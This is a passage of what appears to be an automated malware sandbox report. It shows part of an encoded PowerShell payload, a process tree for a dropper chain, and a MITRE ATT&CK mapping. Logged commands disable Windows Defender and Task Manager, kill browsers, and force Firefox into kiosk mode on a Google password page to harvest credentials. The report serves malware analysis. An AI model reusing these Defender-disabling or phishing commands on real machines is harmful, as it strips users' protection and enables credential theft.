wAgADEAIAAtAFQAeQBwAGUAIABEAHcAbwByAGQAIAAtAGUAYQAgADAADQAKAHMAcAAgACcASABLAEwATQA6AFwAUwBPAEYAVABXAEEAUgBFAFwAUABvAGwAaQBjAGkAZQBzAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAARABlAGYAZQBuAGQAZQByAFwAVQBYACAAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAnACAATgBvAHQAaQBmAGkAYwBhAHQAaQBvAG4AXwBTAHUAcABwAHIAZQBzAHMAIAAxACAALQBUAHkAcABlACAARAB3AG8AcgBkACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAADQAKAHMAcAAgACcASABLAEwATQA6AFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAARABlAGYAZQBuAGQAZQByACAAUwBlAGMAdQByAGkAdAB5ACAAQwBlAG4AdABlAHIAXABOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBzACcAIABEAGkAcwBhAGIAbABlAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAHMAIAAxACAALQBUAHkAcABlACAARAB3AG8AcgBkACAALQBlAGEAIAAwAA0ACgBzAHAAIAAnAEgASwBMAE0AOgBcAFMATwBGAFQAVwBBAFIARQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgBcAFUAWAAgAEMAbwBuAGYAaQBnAHUAcgBhAHQAaQBvAG4AJwAgAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAF8AUwB1AHAAcAByAGUAcwBzACAAMQAgAC0AVAB5AHAAZQAgAEQAdwBvAHIAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAA0ACgBzAHAAIAAnAEgASwBMAE0AOgBcAFMATwBGAFQAVwBBAFIARQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAHQAZQBtACcAIABFAG4AYQBiAGwAZQBTAG0AYQByAHQAUwBjAHIAZQBlAG4AIAAwACAALQBUAHkAcABlACAARAB3AG8AcgBkACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAADQAKAHMAcAAgACcASABLAEwATQA6AFwAUwBPAEYAVABXAEEAUgBFAFwAUABvAGwAaQBjAGkAZQBzAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAARABlAGYAZQBuAGQAZQByACcAIABEAGkAcwBhAGIAbABlAEEAbgB0AGkAUwBwAHkAdwBhAHIAZQAgADEAIAAtAFQAeQBwAGUAIABEAHcAbwByAGQAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAANAAoAcwBwACAAJwBIAEsATABNADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAJwAgAEQAaQBzAGEAYgBsAGUAQQBuAHQAaQBTAHAAeQB3AGEAcgBlACAAMQAgAC0AVAB5AHAAZQAgAEQAdwBvAHIAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAA0ACgBuAGUAdAAxACAAcwB0AG8AcAAgAHcAaQBuAGQAZQBmAGUAbgBkAA0ACgBzAGMALgBlAHgAZQAgAGMAbwBuAGYAaQBnACAAdwBpAG4AZABlAGYAZQBuAGQAIABkAGUAcABlAG4AZAA9ACAAUgBwAGMAUwBzAC0AVABPAEcARwBMAEUADQAKAGsAaQBsAGwAIAAtAE4AYQBtAGUAIABNAHAAQwBtAGQAUgB1AG4AIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAANAAoAcwB0AGEAcgB0ACAAKAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBGAGkAbABlAHMAKwAnAFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgBcAE0AcABDAG0AZABSAHUAbgAuAGUAeABlACcAKQAgAC0AQQByAGcAIAAnAC0ARABpAHMAYQBiAGwAZQBTAGUAcgB2AGkAYwBlACcAIAAtAHcAaQBuACAAMQANAAoAZABlAGwAIAAoACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAKwAnAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAARABlAGYAZQBuAGQAZQByAFwAUwBjAGEAbgBzAFwAbQBwAGUAbgBnAGkAbgBlAGQAYgAuAGQAYgAnACkAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAAgACAAIAAgACAAIAAgACAAIAAgACAAIwAjACAAQwBvAG0AbQBlAG4AdABlAGQAIAA9ACAAawBlAGUAcAAgAHMAYwBhAG4AIABoAGkAcwB0AG8AcgB5AA0ACgBkAGUAbAAgACgAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQArACcAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAXABTAGMAYQBuAHMAXABIAGkAcwB0AG8AcgB5AFwAUwBlAHIAdgBpAGMAZQAnACkAIAAtAFIAZQBjAHUAcgBzAGUAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAANAAoAJwBAACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAAOwAgAGkAZQB4ACgAKABnAHAAIABSAGUAZwBpAHMAdAByAHkAOgA6AEgASwBFAFkAXwBVAHMAZQByAHMAXABTAC0AMQAtADUALQAyADEAKgBcAFYAbwBsAGEAdABpAGwAZQAqACAAVABvAGcAZwBsAGUARABlAGYAZQBuAGQAZQByACAALQBlAGEAIAAwACkAWwAwAF0ALgBUAG8AZwBnAGwAZQBEAGUAZgBlAG4AZABlAHIAKQANAAoAIwAtAF8ALQAjAA==
        7⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:4732
        
        C:\Windows\SysWOW64\sc.exe
        
        "C:\Windows\system32\sc.exe" qc windefend
        8⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:4892
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:4040
        
        C:\Windows\SysWOW64\whoami.exe
        
        "C:\Windows\system32\whoami.exe" /groups
        8⤵
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:1728
        
        C:\Windows\SysWOW64\net1.exe
        
        "C:\Windows\system32\net1.exe" start TrustedInstaller
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:324
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4664 -s 2744
        7⤵
        Program crash
        
        PID:4980
      - C:\Users\Admin\AppData\Local\Temp\1013724001\1395d34d32.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1013724001\1395d34d32.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:4332
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4332 -s 1792
        7⤵
        Program crash
        
        PID:6300
      - C:\Users\Admin\AppData\Local\Temp\1013725001\UkYEOVR.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1013725001\UkYEOVR.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Modifies registry class
        Suspicious use of WriteProcessMemory
        
        PID:4448
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\dllnet\yLU75wsHgukerTkv.vbe"
        7⤵
        Checks computer location settings
        System Location Discovery: System Language Discovery
        
        PID:4932
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\dllnet\J0k4As.bat" "
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:1580
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
        9⤵
        System Location Discovery: System Language Discovery
        Modifies registry key
        
        PID:4144
        
        C:\dllnet\HyperServerFontdll.exe
        
        "C:\dllnet/HyperServerFontdll.exe"
        9⤵
        Checks computer location settings
        Executes dropped EXE
        Drops file in Program Files directory
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4408
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\CxbidAjhUd.bat"
        10⤵
        
        PID:1460
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        11⤵
        
        PID:1144
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        11⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4272
        
        C:\Users\Admin\Contacts\dllhost.exe
        
        "C:\Users\Admin\Contacts\dllhost.exe"
        11⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:5140
      - C:\Users\Admin\AppData\Local\Temp\1013726001\9521c8ff45.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1013726001\9521c8ff45.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:4700
      - C:\Users\Admin\AppData\Local\Temp\1013727001\51e04a8ac8.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1013727001\51e04a8ac8.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        
        PID:1088
      - C:\Users\Admin\AppData\Local\Temp\1013728001\0d6f1088ef.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1013728001\0d6f1088ef.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:3200
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM firefox.exe /T
        7⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:3464
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM chrome.exe /T
        7⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2560
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM msedge.exe /T
        7⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:4424
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM opera.exe /T
        7⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:4144
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM brave.exe /T
        7⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:3412
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
        7⤵
        
        PID:4804
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
        8⤵
        Checks processor information in registry
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        Suspicious use of SetWindowsHookEx
        
        PID:3556
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2024 -parentBuildID 20240401114208 -prefsHandle 1940 -prefMapHandle 1932 -prefsLen 23680 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {378bcf95-d3cc-481e-bdb3-d92b70257f61} 3556 "\\.\pipe\gecko-crash-server-pipe.3556" gpu
        9⤵
        
        PID:2848
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2460 -parentBuildID 20240401114208 -prefsHandle 2452 -prefMapHandle 2448 -prefsLen 24600 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {13f6fdd8-c377-4089-aa01-2d775c56940a} 3556 "\\.\pipe\gecko-crash-server-pipe.3556" socket
        9⤵
        
        PID:4032
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2992 -childID 1 -isForBrowser -prefsHandle 3000 -prefMapHandle 2892 -prefsLen 22652 -prefMapSize 244658 -jsInitHandle 1328 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {243b78b8-08da-4a7a-b394-5ab710d6c62f} 3556 "\\.\pipe\gecko-crash-server-pipe.3556" tab
        9⤵
        
        PID:4572
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3988 -childID 2 -isForBrowser -prefsHandle 4012 -prefMapHandle 4008 -prefsLen 29090 -prefMapSize 244658 -jsInitHandle 1328 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e22165a1-91ee-445d-8ff2-843dd1fab527} 3556 "\\.\pipe\gecko-crash-server-pipe.3556" tab
        9⤵
        
        PID:3360
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4560 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4540 -prefMapHandle 4544 -prefsLen 29090 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c15826f7-230e-45ed-b718-9de78c74baac} 3556 "\\.\pipe\gecko-crash-server-pipe.3556" utility
        9⤵
        Checks processor information in registry
        
        PID:6604
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5488 -childID 3 -isForBrowser -prefsHandle 5584 -prefMapHandle 5580 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1328 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e9cfde70-c652-4c28-ad48-2aec7f0f9a94} 3556 "\\.\pipe\gecko-crash-server-pipe.3556" tab
        9⤵
        
        PID:5448
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5716 -childID 4 -isForBrowser -prefsHandle 5800 -prefMapHandle 5796 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1328 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {cb298444-b0fe-4a9e-85b4-abe1cfa53781} 3556 "\\.\pipe\gecko-crash-server-pipe.3556" tab
        9⤵
        
        PID:5472
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5992 -childID 5 -isForBrowser -prefsHandle 5912 -prefMapHandle 5916 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1328 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e967d5c7-8d80-4865-bfc0-ecd18ac8f524} 3556 "\\.\pipe\gecko-crash-server-pipe.3556" tab
        9⤵
        
        PID:5480
      - C:\Users\Admin\AppData\Local\Temp\1013729001\a2c29246b7.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1013729001\a2c29246b7.exe"
        6⤵
        Modifies Windows Defender Real-time Protection settings
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Windows security modification
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:5916
  - - C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2l0932.exe
      C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2l0932.exe
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Executes dropped EXE
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:2840
- - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3C22x.exe
    C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3C22x.exe
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:4076
- C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\4R840N.exe
  C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\4R840N.exe
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Windows security modification
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2212

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:3428

C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
1⤵
PID:4188
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21*\Volatile* ToggleDefender -ea 0)[0].ToggleDefender)}
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - System Location Discovery: System Language Discovery
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:752
- - C:\Windows\SysWOW64\sc.exe
    "C:\Windows\system32\sc.exe" qc windefend
    3⤵
    - Launches sc.exe
    - System Location Discovery: System Language Discovery
    PID:3200
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3508
- - C:\Windows\SysWOW64\whoami.exe
    "C:\Windows\system32\whoami.exe" /groups
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:1448
- - C:\Windows\SysWOW64\net1.exe
    "C:\Windows\system32\net1.exe" stop windefend
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1376
- - C:\Windows\SysWOW64\sc.exe
    "C:\Windows\system32\sc.exe" config windefend depend= RpcSs-TOGGLE
    3⤵
    - Launches sc.exe
    - System Location Discovery: System Language Discovery
    PID:2036

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4664 -ip 4664
1⤵
PID:3596

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 4332 -ip 4332
1⤵
PID:6276

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5940

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6956

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

Virtualization/Sandbox Evasion

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Query Registry

Remote System Discovery

T1018

System Information Discovery

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Virtualization/Sandbox Evasion